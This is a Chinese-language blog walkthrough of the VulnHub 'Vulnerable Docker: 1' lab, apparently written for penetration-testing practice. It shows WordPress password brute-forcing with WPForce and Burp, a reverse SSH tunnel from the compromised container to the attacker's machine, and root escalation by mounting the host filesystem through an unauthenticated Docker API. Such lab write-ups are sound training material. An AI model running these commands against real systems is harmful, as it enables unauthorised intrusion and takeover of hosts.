No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习

**

VulnHub-Vulnerable Docker: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/vulnerable-docker-1,208/
靶机难度:中级(CTF)
靶机发布日期:2017年9月27日
靶机描述:
是否曾经幻想过在容器中使用docker配置错误,权限提升等问题?
下载此虚拟机,拔出笔尖的帽子并开始使用
我们有2种模式:-HARD:这将需要您结合使用docker技能和笔测试技能来实现主机妥协。-轻松:相对简单的路径,知道docker就足以破坏计算机并在主机上获得根。
我们已在可供您使用的各种机器/系统中植入了3个标记文件。如果您选择接受,则您的任务如下:
标识所有标志(总共2个:flag_1和flag_3)(flag_2被无意中遗漏了)
在主机上获得id = 0 shell访问。
目标:得到root权限&找到flag.txt
作者:大余
时间:2020-01-28
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第1张图片
可以看到靶机开机已经显示了IP:192.168.56.135
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第2张图片
nmap扫到了22和8000端口都打开了…可以看到这又是wordpress CMS
直接访问http8000…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第3张图片
直接上wpscan…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第4张图片
这边有挺多信息,有bob用户,存在robot.txt文件,都查看下吧…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第5张图片
http://192.168.232.134:8000/wp-admin/是登录入口…另外一个没啥用…
这边不用rockyou.txt爆破网站,太浪费时间了…几百万个单词…
这边用WPForce爆破…链接
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第6张图片
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第7张图片
命令:python wpforce.py -i dayu.txt -w /root/Desktop/dayu/10_million_password_list_top_10000.txt -u http://192.168.56.135:8000
命令直接进行爆破,结果:Welcome1 (不懂得可以去查看下链接)
这边还使用bp进行爆破也行,这边填写好代理后,填入bob账号,劫持…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第8张图片
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第9张图片
然后发到intruder,放入字典即可爆破,这边我就不多解释了,知道结果即可…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第10张图片
成功登录…

二、提权

No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第11张图片
找到flag1:
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第12张图片
进来后就很熟悉了,直接提权吧…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第13张图片
成功拿到低权后…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第14张图片
不能sudo…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第15张图片
这边发现本地网络有点问题…存在172.18.0.1~4都能ping通…查看下Docker基础架构看看…
应该是存在remote API未授权访问漏洞利用…
这里本来可以用:reGeorg处理的,但是我不会…很尴尬…我这边用别的方法整代理.
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第16张图片
我这里写了个sh…
#!/bin/bash
hosts=(
“172.18.0.1”
“172.18.0.2”
“172.18.0.3”
“172.18.0.4”
)
END=65535
…自己琢磨吧…
在这里插入图片描述
开启本地服务…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第17张图片
执行,发现了8022端口…在.3上…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第18张图片
查看172.18.0.3:8022的URL发现可以ssh登录…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第19张图片
openssh.deb是这个文件:http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第20张图片
命令:dpkg -x openssh.deb .; cd usr/bin; chmod +x ssh*; ./ssh-keygen -P '' -f id_rsa -t rsa; cat id_rsa.pub
用于登陆ssh…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第21张图片
命令:chmod 600 ~/.ssh/authorized_keys
命令:service ssh restart
将密匙放入本地ssh目录中…然后开启ssh…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第22张图片
命令:./ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownhostsFile=/dev/null -v -i id_rsa -R 8022:172.18.0.3:8022 -fN [email protected]
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第23张图片
成功开启代理…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第24张图片
本地访问8022即可登录…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第25张图片
可以看到docker,可以利用remote API未授权访问…
这边需要用外网…我这边设置的是桥接的局域网环境,我这边得重新弄下改外网环境…
先更新源…然后下载curl…
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第26张图片
命令:

  1. curl -fsSL get.docker.com -o get-docker.sh
  2. sh get-docker.sh
  3. docker ps
    安装了一个docker,可以看到安装成功了…参考链接
    No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习_第27张图片
    命令:docker run -it --rm -v /:/vol wordpress /bin/bash
    使用volume挂载主机上的所有文件到一个目录…成功提权…查看到了flag3…

这台靶机可以学到Docker利用和remote API未授权访问分析和利用…非常好!!!

由于我们已经成功得到root权限和flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

你可能感兴趣的:(No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习)